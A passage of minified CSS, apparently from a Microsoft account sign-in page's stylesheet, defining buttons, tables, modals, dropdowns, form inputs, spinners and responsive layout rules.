12px;margin-top:4px;margin-bottom:4px;position:relative;max-width:100%;text-align:center;white-space:nowrap;overflow:hidden;vertical-align:middle;text-overflow:ellipsis;touch-action:manipulation;color:#000;border-style:solid;border-width:2px;border-color:transparent;background-color:rgba(0,0,0,.2)}.btn:hover,.btn:focus,button:hover,button:focus,input[type=\"button\"]:hover,input[type=\"button\"]:focus,input[type=\"submit\"]:hover,input[type=\"submit\"]:focus,input[type=\"reset\"]:hover,input[type=\"reset\"]:focus{border-color:rgba(0,0,0,.4)}.btn:hover,button:hover,input[type=\"button\"]:hover,input[type=\"submit\"]:hover,input[type=\"reset\"]:hover{cursor:pointer}.btn:active,button:active,input[type=\"button\"]:active,input[type=\"submit\"]:active,input[type=\"reset\"]:active{background-color:rgba(0,0,0,.4);border-color:transparent}.btn.btn-primary,button.btn-primary,input[type=\"button\"].btn-primary,input[type=\"submit\"].btn-primary,input[type=\"reset\"].btn-primary{background-color:#0067b8;border-color:#0067b8;color:#fff}.btn.btn-primary:hover,.btn.btn-primary:focus,button.btn-primary:hover,button.btn-primary:focus,input[type=\"button\"].btn-primary:hover,input[type=\"button\"].btn-primary:focus,input[type=\"submit\"].btn-primary:hover,input[type=\"submit\"].btn-primary:focus,input[type=\"reset\"].btn-primary:hover,input[type=\"reset\"].btn-primary:focus{border-color:#004e8c}.btn.btn-primary:active,button.btn-primary:active,input[type=\"button\"].btn-primary:active,input[type=\"submit\"].btn-primary:active,input[type=\"reset\"].btn-primary:active{background-color:rgba(0,0,0,.4);border-color:transparent}.btn.disabled,.btn[disabled],fieldset[disabled] .btn,button.disabled,button[disabled],fieldset[disabled] button,input[type=\"button\"].disabled,input[type=\"button\"][disabled],fieldset[disabled] input[type=\"button\"],input[type=\"submit\"].disabled,input[type=\"submit\"][disabled],fieldset[disabled] input[type=\"submit\"],input[type=\"reset\"].disabled,input[type=\"reset\"][disabled],fieldset[disabled] input[type=\"reset\"]{cursor:not-allowed;pointer-events:none;outline:none;color:rgba(0,0,0,.2)!important;border-color:transparent!important;background-color:rgba(0,0,0,.2)!important}a.btn:link,a.btn:visited{color:#000}a.btn.btn-primary:link,a.btn.btn-primary:visited{color:#fff}.person{border-radius:50%;display:block;padding:4px;border:1px dotted transparent}.person .person-graphic{display:block;background-size:cover;background-position:center center;background-repeat:no-repeat;border-radius:50%}.person.person-small{width:54px;height:54px}.person.person-small .person-graphic{width:44px;height:44px}.person.person-medium{width:110px;height:110px}.person.person-medium .person-graphic{width:100px;height:100px}.person.person-large{width:210px;height:210px}.person.person-large .person-graphic{width:200px;height:200px}.person:focus{outline-style:none;border-color:#000}table{background-color:transparent}th{text-align:left}.table{width:100%;max-width:100%}.table>thead>tr>th,.table>thead>tr>td,.table>tbody>tr>th,.table>tbody>tr>td,.table>tfoot>tr>th,.table>tfoot>tr>td{padding:16px;vertical-align:top}.table>thead>tr>th{vertical-align:bottom}.table>caption+thead>tr:first-child>th,.table>caption+thead>tr:first-child>td,.table>colgroup+thead>tr:first-child>th,.table>colgroup+thead>tr:first-child>td,.table>thead:first-child>tr:first-child>th,.table>thead:first-child>tr:first-child>td{border-top:0}table col[class*=\"col-\"]{position:static;float:none;display:table-column}table td[class*=\"col-\"],table th[class*=\"col-\"]{position:static;float:none;display:table-cell}.table-responsive{overflow-x:auto;min-height:.01%}@media screen and (max-width:539px){.table-responsive{width:100%;margin-bottom:15px;overflow-y:hidden;-ms-overflow-style:-ms-autohiding-scrollbar}.table-responsive>.table{margin-bottom:0}.table-responsive>.table>thead>tr>th,.table-responsive>.table>thead>tr>td,.table-responsive>.table>tbody>tr>th,.table-responsive>.table>tbody>tr>td,.table-responsive>.table>tfoot>tr>th,.table-responsive>.table>tfoot>tr>td{white-space:nowrap}}.table>thead>tr>th{font-size:12px;line-height:14px;font-weight:400;font-size:.75rem;line-height:.875rem;padding-bottom:1.1816px;padding-top:1.1816px;padding-bottom:1.1816px;padding-top:1.1816px;padding:0 16px 10px 16px}.table>thead>tr>th.text-maxlines-1{white-space:nowrap;text-overflow:ellipsis;max-height:16.3632px;max-height:1.0227rem}.table>thead>tr>th.text-maxlines-2{max-height:30.3632px;max-height:1.8977rem}.table>thead>tr>th.text-maxlines-3{max-height:44.3632px;max-height:2.7727rem}.table>thead>tr>th.text-maxlines-4{max-height:58.3632px;max-height:3.6477rem}.table>tbody>tr:nth-child(odd){background-color:#f2f2f2}.section{margin-top:30px;margin-bottom:30px}@media(min-width:320px){.section{margin-top:42px;margin-bottom:42px}}.section .section-header{padding-bottom:10px;border-bottom:1px solid #e6e6e6;margin-bottom:16px}@media(min-width:320px){.section .section-header{margin-bottom:32px}}.section .section-title{display:block;margin-top:0;margin-bottom:0;font-size:15px;line-height:20px;font-weight:600;font-size:.9375rem;line-height:1.25rem;padding-bottom:.227px;padding-top:.227px;padding-bottom:.227px;padding-top:.227px;color:#000}.section .section-title.text-maxlines-1{white-space:nowrap;text-overflow:ellipsis;max-height:20.454px;max-height:1.27838rem}.section .section-title.text-maxlines-2{max-height:40.454px;max-height:2.52838rem}.section .section-title.text-maxlines-3{max-height:60.454px;max-height:3.77838rem}.section .section-title.text-maxlines-4{max-height:80.454px;max-height:5.02838rem}@media(min-width:320px){.section .section-title{font-size:24px;line-height:28px;font-weight:300;font-size:1.5rem;line-height:1.75rem;padding-bottom:2.3632px;padding-top:2.3632px;padding-bottom:2.3632px;padding-top:2.3632px}.section .section-title.text-maxlines-1{white-space:nowrap;text-overflow:ellipsis;max-height:32.7264px;max-height:2.0454rem}.section .section-title.text-maxlines-2{max-height:60.7264px;max-height:3.7954rem}.section .section-title.text-maxlines-3{max-height:88.7264px;max-height:5.5454rem}.section .section-title.text-maxlines-4{max-height:116.7264px;max-height:7.2954rem}}.section .section-subtitle{display:block;font-size:15px;line-height:20px;font-weight:400;font-size:.9375rem;line-height:1.25rem;padding-bottom:.227px;padding-top:.227px;padding-bottom:.227px;padding-top:.227px;color:#767676}.section .section-subtitle.text-maxlines-1{white-space:nowrap;text-overflow:ellipsis;max-height:20.454px;max-height:1.27838rem}.section .section-subtitle.text-maxlines-2{max-height:40.454px;max-height:2.52838rem}.section .section-subtitle.text-maxlines-3{max-height:60.454px;max-height:3.77838rem}.section .section-subtitle.text-maxlines-4{max-height:80.454px;max-height:5.02838rem}.section .header-action{display:table-cell;vertical-align:bottom;white-space:nowrap;font-size:12px;line-height:14px;font-weight:400;font-size:.75rem;line-height:.875rem;padding-bottom:1.1816px;padding-top:1.1816px;padding-bottom:1.1816px;padding-top:1.1816px}.section .header-action.text-maxlines-1{white-space:nowrap;text-overflow:ellipsis;max-height:16.3632px;max-height:1.0227rem}.section .header-action.text-maxlines-2{max-height:30.3632px;max-height:1.8977rem}.section .header-action.text-maxlines-3{max-height:44.3632px;max-height:2.7727rem}.section .header-action.text-maxlines-4{max-height:58.3632px;max-height:3.6477rem}.section p{margin-top:12px;margin-bottom:12px}.section p .more-container{display:block;margin-top:6px}.section .btn-group{margin-top:20px;margin-bottom:20px}.section.remove-header-rule>.section-header{border-style:none}.section.has-header-action .header-titles{display:table-cell}.section.has-header-action .titles-outer{display:table;table-layout:fixed;width:100%}.section.has-header-action .titles-inner{display:table-cell;padding-right:10px}.section.item-section{margin-bottom:32px}.section.item-section .section-header{margin-bottom:16px;border-style:none;padding-bottom:0}.section.item-section .section-title{color:#000;font-size:15px;line-height:20px;font-weight:600;font-size:.9375rem;line-height:1.25rem;padding-bottom:.227px;padding-top:.227px;padding-bottom:.227px;padding-top:.227px}.section.item-section .section-title.text-maxlines-1{white-space:nowrap;text-overflow:ellipsis;max-height:20.454px;max-height:1.27838rem}.section.item-section .section-title.text-maxlines-2{max-height:40.454px;max-height:2.52838rem}.section.item-section .section-title.text-maxlines-3{max-height:60.454px;max-height:3.77838rem}.section.item-section .section-title.text-maxlines-4{max-height:80.454px;max-height:5.02838rem}.caret{display:inline-block;width:0;height:0;margin-left:2px;vertical-align:middle;border-top:4px solid;border-right:4px solid transparent;border-left:4px solid transparent}.dropdown{position:relative}.dropdown-toggle:focus{outline:0}.dropdown-menu{position:absolute;top:100%;left:0;z-index:1000;display:none;float:left;min-width:160px;padding:5px 0;margin:2px 0 0;list-style:none;font-size:14px;text-align:left;background-color:#fff;border:1px solid #ccc;border:1px solid rgba(0,0,0,.15);border-radius:4px;-webkit-box-shadow:0 6px 12px rgba(0,0,0,.175);box-shadow:0 6px 12px rgba(0,0,0,.175);background-clip:padding-box}.dropdown-menu.pull-right{right:0;left:auto}.dropdown-menu .divider{height:1px;margin:9px 0;overflow:hidden;background-color:#e5e5e5}.dropdown-menu>li>a{display:block;padding:3px 20px;clear:both;font-weight:normal;line-height:1.42857;color:#333;white-space:nowrap}.dropdown-menu>li>a:hover,.dropdown-menu>li>a:focus{text-decoration:none;color:#262626;background-color:#f5f5f5}.dropdown-menu>.active>a,.dropdown-menu>.active>a:hover,.dropdown-menu>.active>a:focus{color:#fff;text-decoration:none;outline:0;background-color:#428bca}.dropdown-menu>.disabled>a,.dropdown-menu>.disabled>a:hover,.dropdown-menu>.disabled>a:focus{color:#777}.dropdown-menu>.disabled>a:hover,.dropdown-menu>.disabled>a:focus{text-decoration:none;background-color:transparent;background-image:none;filter:progid:DXImageTransform.Microsoft.gradient(enabled=false);cursor:not-allowed}.open>.dropdown-menu{display:block}.open>a{outline:0}.dropdown-menu-right{left:auto;right:0}.dropdown-menu-left{left:0;right:auto}.dropdown-header{display:block;padding:3px 20px;font-size:12px;line-height:1.42857;color:#777;white-space:nowrap}.dropdown-backdrop{position:fixed;left:0;right:0;bottom:0;top:0;z-index:990}.pull-right>.dropdown-menu{right:0;left:auto}.dropup .caret,.navbar-fixed-bottom .dropdown .caret{border-top:0;border-bottom:4px solid;content:\"\"}.dropup .dropdown-menu,.navbar-fixed-bottom .dropdown .dropdown-menu{top:auto;bottom:100%;margin-bottom:1px}@media(min-width:768px){.navbar-right .dropdown-menu{right:0;left:auto}.navbar-right .dropdown-menu-left{left:0;right:auto}}[data-toggle=\"buttons\"]>.btn input[type=\"radio\"],[data-toggle=\"buttons\"]>.btn input[type=\"checkbox\"],[data-toggle=\"buttons\"]>.btn-group>.btn input[type=\"radio\"],[data-toggle=\"buttons\"]>.btn-group>.btn input[type=\"checkbox\"]{position:absolute;clip:rect(0,0,0,0);pointer-events:none}.btn-group:before,.btn-group:after{content:\" \";display:table}.btn-group:after{clear:both}.btn-group .btn{float:left;margin-right:4px}.input-group{position:relative;display:table;border-collapse:separate}.input-group[class*=\"col-\"]{float:none;padding-left:0;padding-right:0}.input-group .form-control{position:relative;z-index:2;float:left;width:100%;margin-bottom:0}.input-group-addon,.input-group-btn,.input-group .form-control{display:table-cell}.input-group-addon:not(:first-child):not(:last-child),.input-group-btn:not(:first-child):not(:last-child),.input-group .form-control:not(:first-child):not(:last-child){border-radius:0}.input-group-addon,.input-group-btn{width:1%;white-space:nowrap;vertical-align:middle}.input-group-addon{padding:6px 12px;font-size:14px;font-weight:normal;line-height:1;color:#555;text-align:center;background-color:#eee;border:1px solid #ccc;border-radius:4px}.input-group-addon.input-sm,.input-group-sm>.input-group-addon,.input-group-sm>.input-group-btn>.input-group-addon.btn{padding:5px 10px;font-size:12px;border-radius:3px}.input-group-addon.input-lg,.input-group-lg>.input-group-addon,.input-group-lg>.input-group-btn>.input-group-addon.btn{padding:10px 16px;font-size:18px;border-radius:6px}.input-group-addon input[type=\"radio\"],.input-group-addon input[type=\"checkbox\"]{margin-top:0}.input-group .form-control:first-child,.input-group-addon:first-child,.input-group-btn:first-child>.btn,.input-group-btn:first-child>.btn-group>.btn,.input-group-btn:first-child>.dropdown-toggle,.input-group-btn:last-child>.btn:not(:last-child):not(.dropdown-toggle),.input-group-btn:last-child>.btn-group:not(:last-child)>.btn{border-bottom-right-radius:0;border-top-right-radius:0}.input-group-addon:first-child{border-right:0}.input-group .form-control:last-child,.input-group-addon:last-child,.input-group-btn:last-child>.btn,.input-group-btn:last-child>.btn-group>.btn,.input-group-btn:last-child>.dropdown-toggle,.input-group-btn:first-child>.btn:not(:first-child),.input-group-btn:first-child>.btn-group:not(:first-child)>.btn{border-bottom-left-radius:0;border-top-left-radius:0}.input-group-addon:last-child{border-left:0}.input-group-btn{position:relative;font-size:0;white-space:nowrap}.input-group-btn>.btn{position:relative}.input-group-btn>.btn+.btn{margin-left:-1px}.input-group-btn>.btn:hover,.input-group-btn>.btn:focus,.input-group-btn>.btn:active{z-index:2}.input-group-btn:first-child>.btn,.input-group-btn:first-child>.btn-group{margin-right:-1px}.input-group-btn:last-child>.btn,.input-group-btn:last-child>.btn-group{margin-left:-1px}.alert{margin-bottom:8px;margin-top:8px}.alert-error{color:#e81123}.modal-open{overflow:hidden}.modal{display:none;overflow:hidden;position:fixed;top:0;right:0;bottom:0;left:0;z-index:1040;-webkit-overflow-scrolling:touch;outline:0}.modal-open .modal{overflow-x:hidden;overflow-y:auto}.modal-dialog{position:relative;width:auto}.modal-content{position:relative;background-color:#fff;background-clip:padding-box;outline:0}.modal-backdrop{position:fixed;top:0;right:0;bottom:0;left:0;background-color:#000}.modal-backdrop.fade{opacity:0;filter:alpha(opacity=0)}.modal-backdrop.in{opacity:.5;filter:alpha(opacity=50)}.modal-header{min-height:16.42857px}.modal-title{margin:0;line-height:1.42857}.modal-body{position:relative}.modal-footer:before,.modal-footer:after{content:\" \";display:table}.modal-footer:after{clear:both}.modal-scrollbar-measure{position:absolute;top:-9999px;width:50px;height:50px;overflow:scroll}@media(min-width:540px){.modal-dialog{width:600px}.modal-sm{width:300px}}@media(min-width:768px){.modal-lg{width:900px}}.modal .modal-dialog{margin:50vh auto;-webkit-transform:translate(0,-50%);-ms-transform:translate(0,-50%);-o-transform:translate(0,-50%);transform:translate(0,-50%);border:2px solid #0067b8}.modal .modal-content{padding:16px}.modal p:first-child{margin-top:0}.modal .btn{width:calc(50% - 2px)}.modal .btn:last-child{margin-right:0}.modal .btn:only-child{float:right}.modal .modal-footer{margin-top:24px}.tooltip{position:absolute;z-index:1070;display:block;visibility:visible}.tooltip-inner{text-decoration:none}.tooltip .tooltip-inner{background:#f2f2f2;color:#000;border:1px solid #ccc;padding:5px 8px 7px 8px;max-width:320px}.clearfix:before,.clearfix:after{content:\" \";display:table}.clearfix:after{clear:both}.center-block{display:block;margin-left:auto;margin-right:auto}.hide{display:none!important}.show{display:block!important}.invisible{visibility:hidden}.text-hide{font:0/0 a;color:transparent;text-shadow:none;background-color:transparent;border:0}.hidden{display:none!important;visibility:hidden!important}.affix{position:fixed}.pull-right{float:right!important}.pull-left{float:left!important}@-ms-viewport{width:device-width;}@media(max-width:539px){.visible-xs{display:block!important}table.visible-xs{display:table}tr.visible-xs{display:table-row!important}th.visible-xs,td.visible-xs{display:table-cell!important}}@media(max-width:539px){.visible-xs-block{display:block!important}}@media(max-width:539px){.visible-xs-inline{display:inline!important}}@media(max-width:539px){.visible-xs-inline-block{display:inline-block!important}}@media(min-width:540px) and (max-width:767px){.visible-sm{display:block!important}table.visible-sm{display:table}tr.visible-sm{display:table-row!important}th.visible-sm,td.visible-sm{display:table-cell!important}}@media(min-width:540px) and (max-width:767px){.visible-sm-block{display:block!important}}@media(min-width:540px) and (max-width:767px){.visible-sm-inline{display:inline!important}}@media(min-width:540px) and (max-width:767px){.visible-sm-inline-block{display:inline-block!important}}@media(min-width:768px) and (max-width:991px){.visible-md{display:block!important}table.visible-md{display:table}tr.visible-md{display:table-row!important}th.visible-md,td.visible-md{display:table-cell!important}}@media(min-width:768px) and (max-width:991px){.visible-md-block{display:block!important}}@media(min-width:768px) and (max-width:991px){.visible-md-inline{display:inline!important}}@media(min-width:768px) and (max-width:991px){.visible-md-inline-block{display:inline-block!important}}@media(min-width:992px){.visible-lg{display:block!important}table.visible-lg{display:table}tr.visible-lg{display:table-row!important}th.visible-lg,td.visible-lg{display:table-cell!important}}@media(min-width:992px){.visible-lg-block{display:block!important}}@media(min-width:992px){.visible-lg-inline{display:inline!important}}@media(min-width:992px){.visible-lg-inline-block{display:inline-block!important}}@media(max-width:539px){.hidden-xs{display:none!important}}@media(min-width:540px) and (max-width:767px){.hidden-sm{display:none!important}}@media(min-width:768px) and (max-width:991px){.hidden-md{display:none!important}}@media(min-width:992px){.hidden-lg{display:none!important}}.visible-print{display:none!important}@media print{.visible-print{display:block!important}table.visible-print{display:table}tr.visible-print{display:table-row!important}th.visible-print,td.visible-print{display:table-cell!important}}.visible-print-block{display:none!important}@media print{.visible-print-block{display:block!important}}.visible-print-inline{display:none!important}@media print{.visible-print-inline{display:inline!important}}.visible-print-inline-block{display:none!important}@media print{.visible-print-inline-block{display:inline-block!important}}@media print{.hidden-print{display:none!important}}.visible-xs,.visible-sm,.visible-md,.visible-lg,.visible-xl{display:none!important}.visible-xs-block,.visible-xs-inline,.visible-xs-inline-block,.visible-sm-block,.visible-sm-inline,.visible-sm-inline-block,.visible-md-block,.visible-md-inline,.visible-md-inline-block,.visible-lg-block,.visible-lg-inline,.visible-lg-inline-block,.visible-xl-block,.visible-xl-inline,.visible-xl-inline-block{display:none!important}@media(min-width:1400px){.visible-xl{display:block!important}table.visible-xl{display:table}tr.visible-xl{display:table-row!important}th.visible-xl,td.visible-xl{display:table-cell!important}}@media(min-width:1400px){.visible-xl-block{display:block!important}}@media(min-width:1400px){.visible-xl-inline{display:inline!important}}@media(min-width:1400px){.visible-xl-inline-block{display:inline-block!important}}@media(min-width:1400px){.hidden-xl{display:none!important}}@font-face{font-family:\"Segoe UI Webfont\";font-weight:300;src:local(\"Segoe UI Semilight\")}@font-face{font-family:\"Segoe UI Webfont\";font-weight:700;src:local(\"Segoe UI Bold\")}@font-face{font-family:\"Segoe UI Webfont\";font-style:italic;font-weight:400;src:local(\"Segoe UI Italic\")}@font-face{font-family:\"Segoe UI Webfont\";font-style:italic;font-weight:700;src:local(\"Segoe UI Bold Italic\")}.container,.container-fluid{width:100%}.IE_M9 select,.IE_M9 select option:checked{background-color:#fff!important}.IE_M8 select{background-color:#fff!important}body.IE_M7.rtl{font-family:\"Segoe UI\",\"Ebrima\",\"Nirmala UI\",\"Gadugi\",\"Segoe Xbox Symbol\",\"Segoe UI Symbol\",\"Meiryo UI\",\"Khmer UI\",\"Tunga\",\"Lao UI\",\"Raavi\",\"Iskoola Pota\",\"Latha\",\"Leelawadee\",\"Microsoft YaHei UI\",\"Microsoft JhengHei UI\",\"Malgun Gothic\",\"Estrangelo Edessa\",\"Microsoft Himalaya\",\"Microsoft New Tai Lue\",\"Microsoft PhagsPa\",\"Microsoft Tai Le\",\"Microsoft Yi Baiti\",\"Mongolian Baiti\",\"MV Boli\",\"Myanmar Text\",\"Cambria Math\"}.IE_M7 ul{margin-left:0}.IE_M7 input[type=\"button\"],.IE_M7 input[type=\"submit\"],.IE_M7 button,.IE_M7 input[type=\"button\"].btn,.IE_M7 input[type=\"submit\"].btn,.IE_M7 button.btn{line-height:142%;overflow:visible}.IE_M7 div.input-group{float:left;z-index:5000}.IE_M7 div.input-group button,.IE_M7 div.input-group button.btn{overflow:hidden}.IE_M7 div.input-group label.input-group-addon{width:auto;float:left}.IE_M7 div.input-group div.input-group-btn{float:left}.text-caption{margin:.5rem 0 .5rem 0;margin:8px 0 8px 0}select{padding-top:3px;padding-bottom:3px;padding-left:6px}.section{margin-top:0}.section .section-header{margin-bottom:0}.section .section-title{font-size:1.25rem}body{direction:ltr}body #maincontent,body .pageSectionContainer,body #c_content{margin:0 auto}body #maincontent{width:90%;min-height:400px}.ltr_override,.dirltr{direction:ltr}.Notification,.c_inmiddle_area{max-width:1180px}.c_inmiddle_area{margin-bottom:20px}.input-max-width{max-width:640px}label.label-margin{margin-top:0;margin-bottom:8px}label.input-group-addon{border-width:2px;background-color:transparent;border-color:rgba(0,0,0,.4)}label.disabled{border:0;background-color:rgba(0,0,0,.2)!important}label.input-group-addon.focus-border-color{border-color:#0067b8}label.focus-border-color.input-group-addon.has-error,label.input-group-addon.has-error{border-color:#e81123}button.dropdown-toggle{margin-top:0;margin-bottom:0;height:32px;border-color:rgba(0,0,0,.4);border-left-width:0;min-width:0}.noRightBorder{border-right:0!important}.noLeftBorder{border-left:0!important}.bold{font-weight:600}.modal-header h4.UserTitle,.wrap-content{word-wrap:break-word}label.placeholder{display:none!important}input[type=radio].inlineRadio{margin:0}.recoveryCancelPrintLink{margin-left:15px}.recoveryCancelPadBelow{margin-bottom:20px;margin-bottom:1.25rem}.recoveryCancelProofText{color:rgba(0,0,0,.6)}.apppassword{font-size:120%}.ImeDisabled{ime-mode:inactive}.email-input-max-width{max-width:390px}.Hide{display:none}.hideHipErrorImage{display:none!important}.consetManageServiceLeft{margin-top:6px;float:left}.consetManageServiceRight{float:left;width:280px;margin-left:20px}.consentManageServiceImg{width:40px}.consetOfferActions{list-style-type:none;width:540px;margin:0;padding:0}.consentOfferActionLeft{float:left;padding-right:15px}.consetOfferActionRight{float:left;width:480px}span.linkSeparator{padding-left:4px;padding-right:4px}.padded{padding-top:9px;padding-bottom:9px}.toppadded{padding-top:9px}.consentWebTitleIcon{margin-top:6px}.leftmargin{margin-left:9px}.text-secondary{color:rgba(0,0,0,.7);font-size:13px}.agreement-layout{white-space:pre-wrap;word-wrap:break-word;overflow-x:hidden}body.cb{text-align:center}body.cb #ftrLogo{margin:0}body.cb #maincontent{max-width:384px;padding-left:12px;padding-right:12px}body.cb a{text-decoration:none}body.cb .text-13{font-size:.8125rem}body.cb .radio,body.cb .alert-error{text-align:left}body.cb div.placeholderContainer{width:100%;position:relative}body.cb div.placeholder{color:#666;background-color:transparent;margin-top:6px;margin-left:9px;white-space:nowrap;text-align:left}body.cb div.placeholder.ltr_override{margin-left:11px;margin-right:auto;text-align:left}body.cb .modalDialogOverlay{position:fixed;top:0;left:0;width:100%;height:100%;background-color:#000;opacity:.5;-ms-filter:\"progid:DXImageTransform.Microsoft.Alpha(Opacity=50)\";filter:alpha(opacity=50);z-index:50000}body.cb .modalDialogContainer{position:fixed;top:60px;max-width:356px;width:83%;width:calc(90% - 28px);max-height:80%;max-height:calc(100% - 80px);margin-left:-2px;margin-right:-2px;border:1px solid #0067b8;background-color:#fff;z-index:50001;overflow:auto;overflow-x:hidden}body.cb .modalDialogPadding{padding:11px 12px 12px 12px}body.cb .msa-helpCell{margin-bottom:24px;position:relative}body.cb .msa-helpSVG{float:left;position:absolute}body.cb .msa-helpCellDiv{overflow:hidden;margin-left:44px}body.cb #learnMoreLink,body.cb #signup,body.cb #idA_MSAccLearnMore{white-space:nowrap}body.cb .modalDialogContent{width:100%;position:relative;margin:0 auto}body.cb .img-centipede{width:100%;max-width:266px;height:auto}body.cb .align-center{margin-left:auto;margin-right:auto;display:inline-block}body.cb #icdHIP table{width:100%!important}body.cb input.hip{width:100%!important;padding:4px 8px!important;margin-top:12px!important}body.cb tr#wlspispHIPErrorContainer>td{width:100%!important}body.cb .hip-erroricon{display:none!important}.no-margin-top{margin-top:0}.no-margin-bottom{margin-bottom:0}.no-padding-left-right{padding-left:0;padding-right:0}.display-block{display:block}.display-inline-block{display:inline-block;white-space:nowrap}@media(max-width:319px){body.cb #ftr{margin-top:60px}}@media(min-height:800px){body.cb #ftr{margin-top:60px}}@media(max-height:400px){body.cb .modalDialogContainer{top:0;max-height:100%}}.progress.spinnerText{margin:0;margin-left:20px;position:relative}.progressCommon{position:relative;animation:rotate .8s infinite linear;border:4px solid #0067b8;border-right-color:#fff;border-radius:50%}.progress.spinner{float:left;margin-top:3px;height:16px;width:16px;position:relative;animation:rotate .8s infinite linear;border:4px solid #0067b8;border-right-color:#fff;border-radius:50%}.progress.spinnerLarge{margin:auto;height:100px;width:100px;position:relative;animation:rotate .8s infinite linear;border:4px solid #0067b8;border-right-color:#fff;border-radius:50%}@-webkit-keyframes rotate{0%{transform:rotate(0deg)}100%{transform:rotate(360deg)}}@-moz-keyframes rotate{0%{transform:rotate(0deg)}100%{transform:rotate(360deg)}}@-ms-keyframes rotate{0%{transform:rotate(0deg)}100%{transform:rotate(360deg)}}@-o-keyframes rotate{0%{transform:rotate(0deg);}100%{transform:rotate(360deg);}}@keyframes rotate{0%{transform:rotate(0deg)}100%{transform:rotate(360deg)}}.progress>div{position:absolute;height:3px;width:3px;background-color:#696969;z-index:100}.row.tile:focus .progress>div,.row.tile:focus:hover .progress>div,.row.tile:active .progress>div{background-color:#fff}.progress>div{-webkit-animation:progressDot 2.5s ease-in 0s infinite;-moz-animation:progressDot 2.5s ease-in 0s infinite;-o-animation:progressDot 2.5s ease-in 0s infinite;animation:progressDot 2.5s ease-in 0s infinite}.progress>div:nth-child(2){-webkit-animation-delay:.1s;-moz-animation-delay:.1s;-o-animation-delay:.1s;animation-delay:.1s}.progress>div:nth-child(3){-webkit-animation-delay:.2s;-moz-animation-delay:.2s;-o-animation-delay:.2s;animation-delay:.2s}.progress>div:nth-child(4){-webkit-animation-delay:.3s;-moz-animation-delay:.3s;-o-animation-delay:.3s;animation-delay:.3s}.progress>div:nth-child(5){-webkit-animation-delay:.4s;-moz-animation-delay:.4s;-o-animation-delay:.4s;animation-delay:.4s}.progress>div:nth-child(6){-webkit-animation-delay:.5s;-moz-animation-delay:.5s;-o-animation-delay:.5s;animation-delay:.5s}@-webkit-keyframes progressDot{from{left:0%;-webkit-animation-timing-function:ease-in}40%{left:33%}70%{left:33%;-webkit-animation-timing-function:ease-out}to{left:100%}}@-moz-keyframes progressDot{from{left:0%;-moz-animation-timing-function:ease-in}40%{left:33%}70%{left:33%;-moz-animation-timing-function:ease-out}to{left:100%}}@-o-keyframes progressDot{from{left:0%;-o-animation-timing-function:ease-in;}40%{left:33%;}70%{left:33%;-o-animation-timing-function:ease-out;}to{left:100%;}}@keyframes progressDot{from{left:0%;animation-timing-function:ease-in}40%{left:33%}70%{left:33%;animation-timing-function:ease-out}to{left:100%}}@keyframes pulse{from{opacity:.4}}@-o-keyframes pulse{from{opacity:.4;}}@-moz-keyframes pulse{from{opacity:.4}}@-webkit-keyframes pulse{from{opacity:.4}}@keyframes fadeIn{from{opacity:0}to{opacity:1}}@-o-keyframes fadeIn{from{opacity:0;}to{opacity:1;}}@-moz-keyframes fadeIn{from{opacity:0}to{opacity:1}}@-webkit-keyframes fadeIn{from{opacity:0}to{opacity:1}}div.links a{margin-left:16px;margin-right:16px}div.links a.first{padding-left:0}body.cb{color:#262626;text-align:left}.fadeIn{-webkit-animation:fadeIn 1s;-moz-animation:fadeIn 1s;-o-animation:fadeIn 1s;animation:fadeIn 1s}.backgroundImage{-webkit-animation:fadeIn 1s;-moz-animation:fadeIn 1s;-o-animation:fadeIn 1s;animation:fadeIn 1s}.background-logo{max-width:256px;max-height:24px;margin-bottom:24px;display:block;margin-left:auto;margin-right:auto;-webkit-animation:fadeIn 1s;-moz-animation:fadeIn 1s;-o-animation:fadeIn 1s;animation:fadeIn 1s}.background-logo.large{max-height:36px}.background{background:#f2f2f2}.background,.background>div{position:fixed;top:0;width:100%;height:100%}.background>div{background-repeat:no-repeat,no-repeat;background-position:center center,center center;background-size:cover,cover}.blur{filter:url(\"data:image/svg+xml;utf9,<svg%20version='1.1'%20xmlns='http://www.w3.org/2000/svg'><filter%20id='blur'><feGaussianBlur%20stdDeviation='70'%20/></filter></svg>#blur\");filter:blur(70px);-webkit-filter:blur(70px);-ms-filter:blur(70px);filter:progid:DXImageTransform.Microsoft.Blur(PixelRadius='70')}.background-overlay{background:rgba(0,0,0,.55);filter:progid:DXImageTransform.Microsoft.gradient(GradientType=0,startColorstr='#8C000000',endColorstr='#8C000000');width:100%;height:100%}#footer{position:fixed;bottom:0;width:100%;overflow:visible;z-index:99;clear:both;background-color:rgba(0,0,0,.6);filter:progid:DXImageTransform.Microsoft.gradient(GradientType=0,startColorstr='#99000000',endColorstr='#99000000')}.outer{display:table;position:absolute;height:100%;width:100%}.middle{display:table-cell;vertical-align:middle}.inner{margin-left:auto;margin-right:auto;min-height:450px;min-width:320px;max-width:452px;width:calc(100% - 40px);padding:36px;margin-bottom:28px;background-color:#fff;-webkit-box-shadow:0 2px 3px rgba(0,0,0,.55);-moz-box-shadow:0 2px 3px rgba(0,0,0,.55);box-shadow:0 2px 3px rgba(0,0,0,.55);border:1px solid #818c94;border:1px solid rgba(0,0,0,.4)}.wide{max-width:640px}pre{font-family:inherit}input[type=\"color\"],input[type=\"date\"],input[type=\"datetime\"],input[type=\"datetime-local\"],input[type=\"email\"],input[type=\"month\"],input[type=\"number\"],input[type=\"password\"],input[type=\"search\"],input[type=\"tel\"],input[type=\"text\"],input[type=\"time\"],input[type=\"url\"],input[type=\"week\"],textarea,select{padding:6px 10px;border-width:1px;border-color:#666;border-color:rgba(0,0,0,.6);height:36px;outline:none}input[type=\"color\"]:hover,input[type=\"date\"]:hover,input[type=\"datetime\"]:hover,input[type=\"datetime-local\"]:hover,input[type=\"email\"]:hover,input[type=\"month\"]:hover,input[type=\"number\"]:hover,input[type=\"password\"]:hover,input[type=\"search\"]:hover,input[type=\"tel\"]:hover,input[type=\"text\"]:hover,input[type=\"time\"]:hover,input[type=\"url\"]:hover,input[type=\"week\"]:hover,textarea:hover,select:hover{border-color:#323232;border-color:rgba(0,0,0,.8)}input[type=\"color\"]:focus,input[type=\"date\"]:focus,input[type=\"datetime\"]:focus,input[type=\"datetime-local\"]:focus,input[type=\"email\"]:focus,input[type=\"month\"]:focus,input[type=\"number\"]:focus,input[type=\"password\"]:focus,input[type=\"search\"]:focus,input[type=\"tel\"]:focus,input[type=\"text\"]:focus,input[type=\"time\"]:focus,input[type=\"url\"]:focus,input[type=\"week\"]:focus,textarea:focus,select:focus{border-color:#0067b8}input[type=\"color\"]:focus.has-error,input[type=\"date\"]:focus.has-error,input[type=\"datetime\"]:focus.has-error,input[type=\"datetim